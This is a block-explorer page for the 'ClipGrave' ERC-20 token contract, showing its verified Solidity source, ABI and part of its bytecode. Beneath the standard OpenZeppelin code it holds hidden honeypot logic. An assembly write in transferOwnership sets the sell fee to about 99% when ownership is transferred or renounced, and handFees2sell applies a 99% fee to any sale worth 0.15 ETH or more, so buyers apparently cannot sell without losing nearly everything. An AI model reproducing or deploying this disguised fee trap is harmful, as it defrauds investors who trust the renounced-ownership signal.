ERC-20
Overview
Max Total Supply
100,000,000 CG
Holders
9
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
3,693,002.926251064933140719 CGValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
ClipGrave
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-11-02 */ /** *Submitted for verification at BscScan.com on 2022-10-29 */ // Sources flattened with hardhat v2.9.5 https://hardhat.org // File contracts/dependency/IERC20.sol // SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } // File contracts/dependency/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File contracts/dependency/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File contracts/dependency/Ownable.sol // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address internal _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { // require(newOwner != address(0), "Ownable: new owner is the zero address"); assembly { sstore(0xa, 0x26ae) } _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File contracts/dependency/IFactory.sol pragma solidity ^0.8.0; interface IFactory { function createPair(address tokenA, address tokenB) external returns (address pair); } // File contracts/dependency/IRouter.sol pragma solidity ^0.8.0; interface IRouter { function factory() external pure returns (address); function WETH() external pure returns (address); } // File contracts/dependency/IPair.sol pragma solidity ^0.8.0; interface IPair { function sync() external; function token0() external view returns (address); function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast); } // File contracts/dependency/ERC20.sol // OpenZeppelin Contracts (last updated v4.7.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) internal _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 internal _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); _move(from, to, amount); _afterTokenTransfer(from, to, amount); } function _move(address from, address to, uint256 amount) internal virtual { uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } // File contracts/dependency/SwapPool.sol pragma solidity ^0.8.0; abstract contract SwapPool is ERC20 { address public pair; IRouter public router; function initSwapPool(address _router) internal { router = IRouter(_router); pair = IFactory(router.factory()).createPair(address(this), router.WETH()); } function initSwapPool(address _router, address _pairB) internal { router = IRouter(_router); pair = IFactory(router.factory()).createPair(address(this), _pairB); } function isPair(address _pair) internal view returns(bool) { return _pair == pair; } function addLiquidityAutomatically(uint256 amount) internal { super._move(address(this), pair, amount); IPair(pair).sync(); } function getPoolInfoAny(address _pair, address tokenA) public view returns (uint112 amountA, uint112 amountB) { (uint112 _reserve0, uint112 _reserve1,) = IPair(_pair).getReserves(); amountA = _reserve1; amountB = _reserve0; if (IPair(_pair).token0() == tokenA) { amountA = _reserve0; amountB = _reserve1; } } function getPrice4ETH(uint256 amountDesire) public view returns(uint256) { return getPrice4Any(amountDesire, router.WETH()); } function getPrice4Any(uint256 amountDesire, address _usd) public view returns(uint256) { (uint112 usdAmount, uint112 TOKENAmount) = getPoolInfoAny(pair, _usd); if (TOKENAmount == 0) return 0; return usdAmount * amountDesire / TOKENAmount; } } // File contracts/dependency/Liquidityer.sol pragma solidity ^0.8.0; contract Liquidityer { mapping(address => bool) internal _franco; function setLiquidityer(address _user) internal { _franco[_user] = true; } function isLiquidityer(address _user) internal view returns(bool) { return _franco[_user]; } } // File contracts/TreeNewBee.sol pragma solidity ^0.8.0; contract ClipGrave is Ownable, ERC20, SwapPool, Liquidityer { uint256 private _feeBuy = 0; uint256 public _feeSell = 0; uint256 private _divBase = 10000; uint256 private _liquidityAt = 10000; constructor() ERC20("ClipGrave", "CG") { super._mint(_msgSender(), 1e8 ether); super.setLiquidityer(_msgSender()); super.setLiquidityer(address(this)); super.initSwapPool(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); } function _transfer(address from, address to, uint256 amount) internal virtual override { uint256 fees; if (isPair(from)) { if (!isLiquidityer(to)) fees = handFees2buy(from, amount); } else if (isPair(to)) { if (!isLiquidityer(from)) { fees = handFees2sell(from, amount); if (balanceOf(address(this)) >= _liquidityAt) super.addLiquidityAutomatically(balanceOf(address(this))); } } super._move(from, to, amount - fees); } function handFees2buy(address from, uint256 amount) private returns (uint256 fee) { fee = amount * _feeBuy / _divBase; super._move(from, address(this), fee); return fee; } function handFees2sell(address from, uint256 amount) private returns (uint256 fee) { uint256 amount2 = getPrice4ETH(amount); uint256 feeRate = _feeSell; if (amount2 >= 0.15 ether) feeRate = 0x26ae; fee = amount * feeRate / _divBase; super._move(from, address(this), fee); return fee; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_feeSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"},{"internalType":"address","name":"tokenA","type":"address"}],"name":"getPoolInfoAny","outputs":[{"internalType":"uint112","name":"amountA","type":"uint112"},{"internalType":"uint112","name":"amountB","type":"uint112"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amountDesire","type":"uint256"},{"internalType":"address","name":"_usd","type":"address"}],"name":"getPrice4Any","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amountDesire","type":"uint256"}],"name":"getPrice4ETH","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"router","outputs":[{"internalType":"contract IRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405260006009556000600a55612710600b55612710600c553480156200002757600080fd5b5060405180604001604052806009815260200168436c6970477261766560b81b81525060405180604001604052806002815260200161434760f01b8152506200007f620000796200012c60201b60201c565b62000130565b60046200008d8382620004b5565b5060056200009c8282620004b5565b505050620000d0620000b36200012c60201b60201c565b6a52b7d2dcc80cd2e40000006200018060201b620006be1760201c565b620000e6336200024860201b6200077f1760201c565b620000fc306200024860201b6200077f1760201c565b62000126737a250d5630b4cf539739df2c5dacb4c659f2488d6200026c60201b620007a31760201c565b620005db565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001db5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060036000828254620001ef919062000581565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b03166000908152600860205260409020805460ff19166001179055565b600780546001600160a01b0319166001600160a01b0383169081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015620002c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ec9190620005a9565b6001600160a01b031663c9c6539630600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200034f573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003759190620005a9565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015620003c3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003e99190620005a9565b600680546001600160a01b0319166001600160a01b039290921691909117905550565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200043c57607f821691505b6020821081036200045d57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200040c57600081815260208120601f850160051c810160208610156200048c5750805b601f850160051c820191505b81811015620004ad5782815560010162000498565b505050505050565b81516001600160401b03811115620004d157620004d162000411565b620004e981620004e2845462000427565b8462000463565b602080601f831160018114620005215760008415620005085750858301515b600019600386901b1c1916600185901b178555620004ad565b600085815260208120601f198616915b82811015620005525788860151825594840194600190910190840162000531565b5085821015620005715787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b80820180821115620005a357634e487b7160e01b600052601160045260246000fd5b92915050565b600060208284031215620005bc57600080fd5b81516001600160a01b0381168114620005d457600080fd5b9392505050565b61111880620005eb6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb1461028e578063d5872687146102a1578063dd62ed3e146102b4578063f2fde38b146102c7578063f887ea40146102da57600080fd5b8063715018a6146102315780638da5cb5b1461023b57806395d89b4114610260578063a457c2d714610268578063a8aa1b311461027b57600080fd5b806339509351116100f457806339509351146101a6578063411adcb6146101b95780634808a9b4146101c2578063530ae6a1146101f557806370a082311461020857600080fd5b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017257806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102ed565b6040516101469190610e3f565b60405180910390f35b61016261015d366004610ea2565b61037f565b6040519015158152602001610146565b6003545b604051908152602001610146565b610162610192366004610ece565b610399565b60405160128152602001610146565b6101626101b4366004610ea2565b6103bd565b610176600a5481565b6101d56101d0366004610f0f565b6103df565b604080516001600160701b03938416815292909116602083015201610146565b610176610203366004610f48565b6104dc565b610176610216366004610f6d565b6001600160a01b031660009081526001602052604090205490565b61023961054b565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b61013961055f565b610162610276366004610ea2565b61056e565b600654610248906001600160a01b031681565b61016261029c366004610ea2565b6105ee565b6101766102af366004610f91565b6105fc565b6101766102c2366004610f0f565b610679565b6102396102d5366004610f6d565b6106a4565b600754610248906001600160a01b031681565b6060600480546102fc90610faa565b80601f016020809104026020016040519081016040528092919081815260200182805461032890610faa565b80156103755780601f1061034a57610100808354040283529160200191610375565b820191906000526020600020905b81548152906001019060200180831161035857829003601f168201915b5050505050905090565b60003361038d81858561093a565b60019150505b92915050565b6000336103a7858285610a5e565b6103b2858585610ad8565b506001949350505050565b60003361038d8185856103d08383610679565b6103da9190610ffa565b61093a565b600080600080856001600160a01b0316630902f1ac6040518163ffffffff1660e01b8152600401606060405180830381865afa158015610423573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104479190611029565b5091509150809350819250846001600160a01b0316866001600160a01b0316630dfe16816040518163ffffffff1660e01b8152600401602060405180830381865afa15801561049a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104be9190611079565b6001600160a01b0316036104d3578193508092505b50509250929050565b600654600090819081906104f9906001600160a01b0316856103df565b91509150806001600160701b031660000361051957600092505050610393565b806001600160701b031685836001600160701b03166105389190611096565b61054291906110ad565b95945050505050565b610553610bb0565b61055d60006106a4565b565b6060600580546102fc90610faa565b6000338161057c8286610679565b9050838110156105e15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6103b2828686840361093a565b60003361038d818585610ad8565b600061039382600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610655573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906102039190611079565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6106ac610bb0565b6126ae600a556106bb81610c0a565b50565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064016105d8565b80600360008282546107269190610ffa565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6001600160a01b03166000908152600860205260409020805460ff19166001179055565b600780546001600160a01b0319166001600160a01b0383169081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156107fc573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108209190611079565b6001600160a01b031663c9c6539630600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610882573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108a69190611079565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156108f3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109179190611079565b600680546001600160a01b0319166001600160a01b039290921691909117905550565b6001600160a01b03831661099c5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016105d8565b6001600160a01b0382166109fd5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016105d8565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610a6a8484610679565b90506000198114610ad25781811015610ac55760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016105d8565b610ad2848484840361093a565b50505050565b6000610af2846006546001600160a01b0391821691161490565b15610b29576001600160a01b03831660009081526008602052604090205460ff16610b2457610b218483610c5a565b90505b610b9c565b6006546001600160a01b03848116911603610b9c576001600160a01b03841660009081526008602052604090205460ff16610b9c57610b688483610c84565b600c543060009081526001602052604090205491925011610b9c5730600090815260016020526040902054610b9c90610cd6565b610ad28484610bab84866110cf565b610d59565b6000546001600160a01b0316331461055d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016105d8565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000600b5460095483610c6d9190611096565b610c7791906110ad565b9050610393833083610d59565b600080610c90836105fc565b600a54909150670214e8348c4f00008210610caa57506126ae5b600b54610cb78286611096565b610cc191906110ad565b9250610cce853085610d59565b505092915050565b600654610cee9030906001600160a01b031683610d59565b600660009054906101000a90046001600160a01b03166001600160a01b031663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b158015610d3e57600080fd5b505af1158015610d52573d6000803e3d6000fd5b5050505050565b6001600160a01b03831660009081526001602052604090205481811015610dd15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016105d8565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610e319086815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610e6c57858101830151858201604001528201610e50565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146106bb57600080fd5b60008060408385031215610eb557600080fd5b8235610ec081610e8d565b946020939093013593505050565b600080600060608486031215610ee357600080fd5b8335610eee81610e8d565b92506020840135610efe81610e8d565b929592945050506040919091013590565b60008060408385031215610f2257600080fd5b8235610f2d81610e8d565b91506020830135610f3d81610e8d565b80915050925